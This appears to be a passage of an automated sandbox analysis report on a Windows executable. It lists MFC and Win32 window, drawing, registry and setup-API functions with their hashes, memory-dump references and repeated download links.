Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$CountDefaultState
String ID:
API String ID: 170603052-0
Opcode ID: 84b1ac8f4de1d00b2367a9130c075de75076b88e53ac48ba5aea7a652e39fccb
Instruction ID: 1d692375bfa7c9735019cfe5808b93150c0e360c26be76030b7527a087fb4198
Opcode Fuzzy Hash: 84b1ac8f4de1d00b2367a9130c075de75076b88e53ac48ba5aea7a652e39fccb
Instruction Fuzzy Hash: EB417175600205AFCF11AF61C889AADBFB5FF48714F209529FA06DB2A1CB34ED41DB90

Function 0052CEB2 Relevance: 9.1, APIs: 6, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0052CEB9
GetTopWindow.USER32(?), ref: 0052CF24
GetWindow.USER32(?,00000002), ref: 0052CF42
IsWindow.USER32(?), ref: 0052CF61
GetParent.USER32(?), ref: 0052CF6C
DestroyWindow.USER32(?), ref: 0052CF78

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3$DestroyException@8ParentThrow
String ID:
API String ID: 3096848108-0
Opcode ID: bbcf278de2aa6a370839bf3de3accc279ae9bbbd5e52aecbfcabc3fcb8f1d0db
Instruction ID: 1a082c9134816687172089d10bcaa4c639c67a86e469bccd2bd4ef3a3ef207a8
Opcode Fuzzy Hash: bbcf278de2aa6a370839bf3de3accc279ae9bbbd5e52aecbfcabc3fcb8f1d0db
Instruction Fuzzy Hash: D741EF31900624DFCF22EFA4D9896ADBFB2BF99300F254589E845BB292DB345D40DB91

Function 0051CCD8 Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0051CD09
OffsetRect.USER32(?,?,?), ref: 0051CD27
SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 0051CD34
IsWindowVisible.USER32(?), ref: 0051CD3D
SendMessageW.USER32(00000014,0000000B,00000001,00000000), ref: 0051CDB0
RedrawWindow.USER32(00000105,00000000,00000000,00000105), ref: 0051CDC0

Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MessageRectSend$OffsetRedrawVisible
String ID:
API String ID: 2707749077-0
Opcode ID: 48781029bfed2a224b8ceed2acc585d9b9960b60e9aa7d77e6aebb410d5785af
Instruction ID: 65c6569259997f4562c8e82ac8a3e9f784c0388e02931b04735fd928e956731c
Opcode Fuzzy Hash: 48781029bfed2a224b8ceed2acc585d9b9960b60e9aa7d77e6aebb410d5785af
Instruction Fuzzy Hash: E631ECB2A00249AFDB11DFA5CD85EBFBFB9FB48704F10052DB556E6190DA75AD00DB20

Function 00542D0B Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(00000000,00000000,005080B7,000000C6,00FF0062,00000000), ref: 00542D32
SetBkColor.GDI32(00F0F0F0), ref: 00542D55
BitBlt.GDI32(00000000,00000000,005080B9,000000C8,00000000,00000000,00CC0020), ref: 00542D83
SetBkColor.GDI32 ref: 00542D96
BitBlt.GDI32(00000000,00000000,005080B9,000000C8,00000000,00000000,00EE0086), ref: 00542DBE
BitBlt.GDI32(00000000,00000001,00000001,005080BA,000000C9,00000000,00000000,00000000,008800C6), ref: 00542DE1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: c5f419428ebb458eac0d9263d2ec5afdeda9d7881ae922c0718550a979a4410c
Instruction ID: a10f6432a6b789ba245c6cdd3ba4d2d1496d9a57b97e0e7384f60772af5e2487
Opcode Fuzzy Hash: c5f419428ebb458eac0d9263d2ec5afdeda9d7881ae922c0718550a979a4410c
Instruction Fuzzy Hash: F7217CB6600708BFEB249F94ED85D777BAEFB4A3587000629F245C6270C6B1AC21DB20

Function 00532C5F Relevance: 9.1, APIs: 6, Instructions: 76windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00532C66

Part of subcall function 004E0431: __EH_prolog3.LIBCMT ref: 004E0438
Part of subcall function 004E0431: GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464

CreateCompatibleDC.GDI32(00000000), ref: 00532C88
GetSystemMetrics.USER32(00000036), ref: 00532C9F
GetSystemMetrics.USER32(00000036), ref: 00532CA6
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00532CBF

Part of subcall function 004E066D: SelectObject.GDI32(?,?), ref: 004E0678

DrawFrameControl.USER32(?,?,00000001,00002000), ref: 00532CF9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreateMetricsSystem$BitmapControlDrawFrameH_prolog3H_prolog3_ObjectSelectWindow
String ID:
API String ID: 3758044866-0
Opcode ID: 6820bdb6dcb21dadfd2e967c1a5c8bdd3e2a43c8ca66c80e041a3ddae1a239b2
Instruction ID: ba717043879c8cdaa0899003fa0f8f761be09f19a72fc362a9f2f5214eb16642
Opcode Fuzzy Hash: 6820bdb6dcb21dadfd2e967c1a5c8bdd3e2a43c8ca66c80e041a3ddae1a239b2
Instruction Fuzzy Hash: C4310170D00258AFCB05EFE6C985AEDBFB4BF18304F54806AE511B7291DBB85A48DF64

Function 004E4CAE Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004E4CE1
GetParent.USER32(?), ref: 004E4CEF
GetParent.USER32(?), ref: 004E4D02
GetLastActivePopup.USER32(?), ref: 004E4D13
IsWindowEnabled.USER32(?), ref: 004E4D27
EnableWindow.USER32(?,00000000), ref: 004E4D3A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: c651437796e8c9953fe2918ea52fa2e85ac1260eac8acddf423f43cbcb326802
Instruction ID: fce3da4a28211f788259e10a7eb1917e59ae6cfb8a2eb050c548919cbf55119f
Opcode Fuzzy Hash: c651437796e8c9953fe2918ea52fa2e85ac1260eac8acddf423f43cbcb326802
Instruction Fuzzy Hash: 3D1194325026B157DB311A5B9C44B3B63989FD4BA3F274157ED01E7304DB2DDC0192A9

Function 005166C7 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005166D3
GetWindow.USER32(00000000), ref: 005166DA
GetWindowLongW.USER32(00000000,000000F0), ref: 00516716
ShowWindow.USER32(00000000,00000000,?,?,?,?,00517F19,00000001), ref: 00516731
ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,00517F19,00000001), ref: 00516755
GetWindow.USER32(00000000,00000002), ref: 0051675E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: a788d3c6c13bfccc81a647d5b73487efa0e9d0d2be466ce09efbdd7c42eec2f4
Instruction ID: 739ce501a9b43f10e10d47abe080016e88d94dc62367261dea9ae2bd676c4667
Opcode Fuzzy Hash: a788d3c6c13bfccc81a647d5b73487efa0e9d0d2be466ce09efbdd7c42eec2f4
Instruction Fuzzy Hash: 8311CE31501744ABEB219B298C99FBB7EA9FBA1B68F240598F501D22D0DF78CC80DA50

Function 00555723 Relevance: 9.1, APIs: 6, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00555765
GetMenuState.USER32(?,00000000,00000400), ref: 00555782
GetMenuItemID.USER32(?,00000000), ref: 00555791
CheckMenuItem.USER32(?,00000000,00000008), ref: 005557A5
EnableMenuItem.USER32(?,00000000,00000002), ref: 005557B7
EnableMenuItem.USER32(?,00000000,00000001), ref: 005557C9

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Enable$CheckCountException@8H_prolog3StateThrow
String ID:
API String ID: 4237646742-0
Opcode ID: 39841df786085760f6232cb86050113c39036951884aa80efab356895b068f38
Instruction ID: 2bc90528bf105d38aba9a777714b24ca9a029a5b30363b4eb7080ea59aea1ca2
Opcode Fuzzy Hash: 39841df786085760f6232cb86050113c39036951884aa80efab356895b068f38
Instruction Fuzzy Hash: 0F210230900609FBDB116B65CC6AB6DBFB9FF40345F20805AF811A2161DB769D04DB40

Function 004E43B1 Relevance: 9.1, APIs: 6, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004E43D9
RegDeleteValueW.ADVAPI32(00000000,?), ref: 004E43F8
RegCloseKey.ADVAPI32(00000000), ref: 004E4425

Part of subcall function 004E41A4: RegCloseKey.ADVAPI32(?), ref: 004E4249
Part of subcall function 004E41A4: RegCloseKey.ADVAPI32(?), ref: 004E4253

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004E4440

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Close$Delete$PrivateProfileStringValueWrite
String ID:
API String ID: 1330817964-0
Opcode ID: 07e9a4426612d23f7c9f5ac29237f1582390e1c2eb0d6ce680fe425ff2774a3d
Instruction ID: 5a6fd8dc3ddae70e1c385fbf3f410bf5e717a841a996e06d604bbb378eba1568
Opcode Fuzzy Hash: 07e9a4426612d23f7c9f5ac29237f1582390e1c2eb0d6ce680fe425ff2774a3d
Instruction Fuzzy Hash: 3311E733500195FFCF212FA2DC88CBF3B6AFF983567018426FA1586021CB398912EB59

Function 004E0FBC Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004E0FD8
GetDlgCtrlID.USER32(00000000), ref: 004E0FE9
GetWindowLongW.USER32(00000000,000000F0), ref: 004E0FF9
GetWindowRect.USER32(00000000,00000000), ref: 004E101B
PtInRect.USER32(00000000,00000000,00000000), ref: 004E102B
GetWindow.USER32(?,00000005), ref: 004E1038

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 18d6894ee0c68081b233dcf82ac7eb75409c4d081fe3eebf09c5d4ecaa7e1e68
Instruction ID: a5e9f1b4f6ba274a5610674ac1863bfeebb5ebbaa2c703c0e451c98abbdaf7f4
Opcode Fuzzy Hash: 18d6894ee0c68081b233dcf82ac7eb75409c4d081fe3eebf09c5d4ecaa7e1e68
Instruction Fuzzy Hash: F7119E72941159ABDB11AF55CC08BBE77B8EF25362F204015F501E21A0CB789A45DB96

Function 004E1116 Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 004E111C
GetParent.USER32(00000000), ref: 004E1144

Part of subcall function 004E0F09: GetWindowLongW.USER32(?,000000F0), ref: 004E0F2A
Part of subcall function 004E0F09: GetClassNameW.USER32(?,?,0000000A), ref: 004E0F3F
Part of subcall function 004E0F09: CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 004E0F59

GetWindowLongW.USER32(?,000000F0), ref: 004E115F
GetParent.USER32(?), ref: 004E116D
GetDesktopWindow.USER32 ref: 004E1171
SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004E1185

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
String ID:
API String ID: 1233893325-0
Opcode ID: 8dc177a75fdab5c1a88aee032631d51a7bc28e1e789aa7c2338ad493661d3041
Instruction ID: 21f37001f821796cb61e71ac9a5ccb8a9a173045a5bb671bceef8a067c505297
Opcode Fuzzy Hash: 8dc177a75fdab5c1a88aee032631d51a7bc28e1e789aa7c2338ad493661d3041
Instruction Fuzzy Hash: 4901A73228039136DB2127375C84B3B656CAB99752F144526F700E33A0DF7DDC01915C

Function 005D53DA Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 005D53E6

Part of subcall function 005D5DC1: __getptd_noexit.LIBCMT ref: 005D5DC4
Part of subcall function 005D5DC1: __amsg_exit.LIBCMT ref: 005D5DD1

__amsg_exit.LIBCMT ref: 005D5406
__lock.LIBCMT ref: 005D5416
InterlockedDecrement.KERNEL32(?), ref: 005D5433
_free.LIBCMT ref: 005D5446
InterlockedIncrement.KERNEL32(00B72D00), ref: 005D545E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d793ba950fb22d410af275c4cc97769c32dde47862a63e26edff83fccff65886
Instruction ID: 0c2dab92d4de922626cb3a8abf43b640140704faa8201fad17b1bc0ea8ba991f
Opcode Fuzzy Hash: d793ba950fb22d410af275c4cc97769c32dde47862a63e26edff83fccff65886
Instruction Fuzzy Hash: 9C01C836941B129BCF31AFACD809B5E7FA1BB05711F084017E800AB391EB7459C2CBD2

Function 004EC767 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 243COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004EC797

Strings

AfxFrameOrView100su, xrefs: 004EC85D
@, xrefs: 004EC93C
@, xrefs: 004EC8A3
AfxMDIFrame100su, xrefs: 004EC838

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView100su$AfxMDIFrame100su
API String ID: 2102423945-2639805938
Opcode ID: 70c62069f7b131dd6adddc434e93edad874b1211f465b7546182955801890fd8
Instruction ID: 6e5c4257679a3be120f42a618b1e468193b112a207aafb2bfa609046ab96adfd
Opcode Fuzzy Hash: 70c62069f7b131dd6adddc434e93edad874b1211f465b7546182955801890fd8
Instruction Fuzzy Hash: AD9144B1C002996ADB50DF96D5C5BDEBBF8AF04345F10806AFD08E6281D7788A45D7A4

Function 005611BB Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?,?), ref: 005611F9

Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99

FillRect.USER32(?,?,?), ref: 0056127E
FillRect.USER32(?,?,?), ref: 005612F6

Part of subcall function 004E07E6: __EH_prolog3.LIBCMT ref: 004E07ED
Part of subcall function 004E07E6: CreateSolidBrush.GDI32(00000000), ref: 004E0808

Strings

@, xrefs: 00561356

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FillRect$BrushCreateH_prolog3H_prolog3_catch_Solid
String ID: @
API String ID: 3782896364-2766056989
Opcode ID: 6364da799f5a3513b7782a6f404d737bdb4a3304f4c0299d2cc8e5b0a85ca272
Instruction ID: 583b7634aa8f7806d2034296c1d8f36ed8a2436de565be1bf6c78c16f2c34c8d
Opcode Fuzzy Hash: 6364da799f5a3513b7782a6f404d737bdb4a3304f4c0299d2cc8e5b0a85ca272
Instruction Fuzzy Hash: 05A10371D0021A9FCF08CFA9C9959EEBBB1FF48315F05811AE816BB250D774AA45CFA4

Function 004D22C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

SetupFindFirstLineW.SETUPAPI(?,?,00000000,0000002C,00622A58,9E026D90,00622A58,00000000), ref: 004D2315
SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 004D23B0
SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 004D244A

Strings

VID_1782, xrefs: 004D2362, 004D23E7
VID_0525, xrefs: 004D2389, 004D240E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindLineSetup$Next$First
String ID: VID_0525$VID_1782
API String ID: 1432318419-2521349241
Opcode ID: db0aea4e2a2509786f28f1e5bc4fafeddca9bcfccd15b89745ce91efadc3ba4a
Instruction ID: 62e08ba450e96a505f622d78809f7f404ebe41ad0219f4f50fccb66b716bf423
Opcode Fuzzy Hash: db0aea4e2a2509786f28f1e5bc4fafeddca9bcfccd15b89745ce91efadc3ba4a
Instruction Fuzzy Hash: 2281DB71A006069FCB04CF68CDA1AAEB7A1FF65324B14876EE825D73D1DB79A900CB54

